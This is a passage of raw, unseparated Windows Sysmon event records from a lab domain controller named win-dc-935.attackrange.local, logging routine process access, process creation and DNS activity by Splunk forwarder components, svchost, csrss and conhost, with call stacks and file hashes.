Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007723Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:03.553{10ACEC4A-85F3-5FCF-4D01-000000009101}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007722Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:03.021{10ACEC4A-85F2-5FCF-4C01-000000009101}31843164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007763Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.895{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85F4-5FCF-4F01-000000009101}3932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007762Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.895{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007761Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.895{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007760Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.895{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007759Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.895{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007758Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.895{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007757Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.895{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007756Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.895{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007755Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.895{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007754Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.895{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007753Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.895{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85F4-5FCF-4F01-000000009101}3932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007752Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.895{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85F4-5FCF-4F01-000000009101}3932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007751Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.896{10ACEC4A-85F4-5FCF-4F01-000000009101}3932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000007750Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.145{10ACEC4A-85F0-5FCF-4901-000000009101}3056win-dc-935.attackrange.local010.0.1.14;C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe 10341000x80000000000000007749Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.224{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85F4-5FCF-4E01-000000009101}2228C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007748Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.224{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007747Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.224{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007746Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.224{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007745Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.224{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007744Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.224{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007743Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.224{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007742Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.224{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007741Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.224{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007740Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.224{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007739Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.224{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85F4-5FCF-4E01-000000009101}2228C:\Program 